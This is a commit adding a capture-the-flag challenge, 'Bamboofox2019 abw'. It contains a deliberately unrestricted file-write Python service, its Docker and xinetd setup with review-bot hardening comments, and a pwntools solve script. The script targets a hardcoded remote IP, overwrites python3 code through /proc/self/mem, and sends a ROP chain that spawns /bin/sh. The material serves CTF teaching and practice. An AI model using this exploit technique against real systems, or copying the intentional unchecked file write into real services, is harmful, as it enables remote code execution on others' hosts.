Commit 9a18875

committed
arbitrary write
1 parent 1ef0191 commit 9a18875

9 files changed

+135
-0
lines changed


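--- a/Bamboofox2019_abw/Dockerfile
+++ b/Bamboofox2019_abw/Dockerfile
@@ -0,0 +1,17 @@
+FROM ubuntu:18.04
+MAINTAINER Billy
+RUN apt-get update
+RUN apt-get upgrade -y
+RUN apt-get install xinetd -y
+RUN apt-get install python3 -y
+RUN useradd -m abw
+COPY ./share /home/abw
+COPY ./xinetd /etc/xinetd.d/abw
+COPY ./flag /home/abw/flag
+RUN chmod 774 /tmp
+RUN chmod -R 774 /var/tmp
+RUN chmod -R 774 /dev
+RUN chmod -R 774 /run
+RUN chmod 1733 /tmp /var/tmp /dev/shm
+RUN chown -R root:root /home/abw
+CMD ["/usr/sbin/xinetd","-dontfork"]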
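Review bot: The build-time `RUN chmod -R 774 /dev` and `RUN chmod -R 774 /run` on lines 13–14 most likely have no effect in the running container, because Docker mounts fresh tmpfs filesystems over /dev and /run when the container starts; worth verifying with `ls -ld /dev /run` inside a started container and, if confirmed, dropping them or moving that hardening into an entrypoint. The standalone `RUN apt-get update` layer goes stale independently of the install layers and the installs pull in recommended packages; the usual form is one layer, `RUN apt-get update && apt-get install -y --no-install-recommends xinetd python3 && rm -rf /var/lib/apt/lists/*`. `MAINTAINER` is deprecated in favour of `LABEL maintainer="Billy"`. The flag file is copied with whatever mode it has in the checkout and only chowned, so an explicit `RUN chmod 444 /home/abw/flag` would make its readability a property of the Dockerfile rather than of the host filesystem.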
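--- a/Bamboofox2019_abw/docker-compose.yml
+++ b/Bamboofox2019_abw/docker-compose.yml
@@ -0,0 +1,22 @@
+abw:
+build: ./
+environment:
+- OLDPWD=/home
+- XDG_RUNTIME_DIR=/run/user/1000
+- LESSOPEN=| /usr/bin/lesspipe %s
+- LANG=en_US
+- SHLVL=1
+- SHELL=/bin/bash
+- FLAG=/
+- ROOT=/
+- TCP_PORT=12345
+- PORT=12345
+- X_PORT=12345
+- SERVICE=abw
+- XPC_FLAGS=0x0
+- TMPDIR=/tmp
+- RBENV_SHELL=bash
+ports:
+- "12345:12345"
+expose:
+- "12345"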
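Review bot: Most of the `environment:` block (`OLDPWD`, `XDG_RUNTIME_DIR`, `LESSOPEN`, `XPC_FLAGS`, `RBENV_SHELL`, `SHLVL`) reads like a copy of the author's interactive shell rather than settings the service uses, and `FLAG=/` / `ROOT=/` look like template leftovers; nothing in the committed Dockerfile, xinetd file or `share/abw` appears to read any of them. Trimming the list to what the service actually needs (possibly nothing) removes noise and avoids shipping host details by accident. `expose:` is redundant once `ports:` publishes 12345. Because the service hands unauthenticated clients an arbitrary file write and the xinetd limits only bound CPU time, a container-level cap such as `mem_limit: 512m` would keep one session from exhausting host memory; this file uses the legacy v1 compose format, where that key is valid.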
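--- a/Bamboofox2019_abw/flag
+++ b/Bamboofox2019_abw/flag
@@ -0,0 +1 @@
+BAMBOOFOX{XXX}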
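--- a/Bamboofox2019_abw/share/abw
+++ b/Bamboofox2019_abw/share/abw
@@ -0,0 +1,8 @@
+#!/usr/bin/env python3
+
+print( "Write File")
+filename = input("File Name :")
+with open(filename,"wb") as file:
+seek = int(input("Seek :"))
+file.seek(seek)
+file.write(bytes.fromhex(input("Data (hex):")[:20]))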
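Review bot: The script carries no comment stating its contract, and three behaviours are easy to misread: `open(filename, "wb")` truncates an existing regular file before `seek()` runs, the `[:20]` slice caps the hex digits rather than the bytes so at most 10 bytes are written, and a non-integer seek or odd-length hex string raises an uncaught `ValueError` that ends the session (with stderr discarded by run.sh, silently). I would add a header after the shebang along the lines of `# Challenge service: writes up to 10 caller-supplied bytes at a caller-chosen offset of a caller-chosen path; the path is intentionally unrestricted and a regular file is truncated on open.` That way the next maintainer knows the missing path validation is the challenge, not an oversight.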
‎Bamboofox2019_abw/share/python3.6‎

4.32 MB
Binary file not shown.

‎Bamboofox2019_abw/share/python3.i64‎

34.4 MB
Binary file not shown.

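--- a/Bamboofox2019_abw/share/run.sh
+++ b/Bamboofox2019_abw/share/run.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+exec 2> /dev/null
+timeout 60 /home/abw/abw
+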
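Review bot: `timeout 60 /home/abw/abw` on line 3 sends only SIGTERM when the limit expires, so a process that ignores or handles that signal keeps running past the intended 60 seconds; `timeout -k 5 60 /home/abw/abw` follows up with SIGKILL after a short grace period. `exec 2> /dev/null` keeps tracebacks away from clients, which is reasonable for a challenge, but it also hides deployment mistakes such as a missing interpreter or wrong mode bits, so it is worth confirming the service starts correctly before relying on it. Line 4 is an empty trailing line, harmless but probably unintended.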
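--- a/Bamboofox2019_abw/share/solve.py
+++ b/Bamboofox2019_abw/share/solve.py
@@ -0,0 +1,68 @@
+#!/usr/bin/python2
+#-*- coding:utf-8 -*-
+
+from pwn import *
+from pwn import sleep
+context.log_level = "critical"
+context.binary = "/usr/bin/python3"
+elf = context.binary
+
+# io = process("./abw")
+io = remote("34.82.101.212", 10010)
+
+io.sendlineafter(" :", "/proc/self/mem")
+
+offset = 0x4b0f80
+io.sendlineafter(" :", str(offset))
+
+# gdb.attach(io, '''b *0x4b0f78\nc''')
+data = asm('''
+mov rsi, rsp
+mov rdx, r12
+pop rdi
+syscall
+ret
+''').encode('hex')
+print(len(data))
+assert len(data) <= 20
+io.sendlineafter(":", data)
+sleep(0.01)
+
+from struct import pack
+
+p = lambda x : pack('Q', x)
+
+IMAGE_BASE_0 = 0x0000000000400000 # 577e6f13d080302dd4c6e653134fee0234c7b4b4a9b03c849f6d0b176aa379b2
+rebase_0 = lambda x : p(x + IMAGE_BASE_0)
+
+rop = ''
+rop += 'padding0円'
+
+rop += rebase_0(0x0000000000020d7c) # 0x0000000000420d7c: pop r13; ret;
+rop += '//bin/sh'
+rop += rebase_0(0x0000000000020bb0) # 0x0000000000420bb0: pop r12; ret;
+rop += rebase_0(0x00000000005b4ea0)
+rop += rebase_0(0x000000000015c64d) # 0x000000000055c64d: mov qword ptr [r12], r13; pop r12; pop r13; pop r14; ret;
+rop += p(0xdeadbeefdeadbeef)
+rop += p(0xdeadbeefdeadbeef)
+rop += p(0xdeadbeefdeadbeef)
+rop += rebase_0(0x0000000000020d7c) # 0x0000000000420d7c: pop r13; ret;
+rop += p(0x0000000000000000)
+rop += rebase_0(0x0000000000020bb0) # 0x0000000000420bb0: pop r12; ret;
+rop += rebase_0(0x00000000005b4ea8)
+rop += rebase_0(0x000000000015c64d) # 0x000000000055c64d: mov qword ptr [r12], r13; pop r12; pop r13; pop r14; ret;
+rop += p(0xdeadbeefdeadbeef)
+rop += p(0xdeadbeefdeadbeef)
+rop += p(0xdeadbeefdeadbeef)
+rop += rebase_0(0x0000000000021872) # 0x0000000000421872: pop rdi; ret;
+rop += rebase_0(0x00000000005b4ea0)
+rop += rebase_0(0x000000000002159a) # 0x000000000042159a: pop rsi; ret;
+rop += rebase_0(0x00000000005b4ea8)
+rop += rebase_0(0x00000000000026c1) # 0x00000000004026c1: pop rdx; ret;
+rop += rebase_0(0x00000000005b4ea8)
+rop += rebase_0(0x0000000000021095) # 0x0000000000421095: pop rax; ret;
+rop += p(0x000000000000003b)
+rop += rebase_0(0x000000000009a009) # 0x000000000049a009: syscall;
+io.sendline(rop)
+
+io.interactive()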
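--- a/Bamboofox2019_abw/xinetd
+++ b/Bamboofox2019_abw/xinetd
@@ -0,0 +1,15 @@
+service abw
+{
+disable = no
+type = UNLISTED
+wait = no
+server = /home/abw/run.sh
+socket_type = stream
+protocol = tcp
+user = abw
+port = 12345
+flags = REUSE
+per_source = 5
+rlimit_cpu = 3
+nice = 18
+}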
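Review bot: The service bounds CPU time (`rlimit_cpu = 3`) and connections per client (`per_source = 5`) but leaves address space and the total number of concurrent server processes unbounded; for a service that is expected to be exploited, `rlimit_as = 256M` and `instances = 30` limit what a single client can do to the host. I believe `flags = REUSE` is a no-op on current xinetd, which treats every service as REUSE, so it could be dropped to avoid implying it still matters — verify against the installed xinetd.conf(5). The `server` line points at `/home/abw/run.sh`, which the Dockerfile makes root-owned; that is the right arrangement, since the `abw` user then cannot alter its own launcher even with the write primitive the challenge grants.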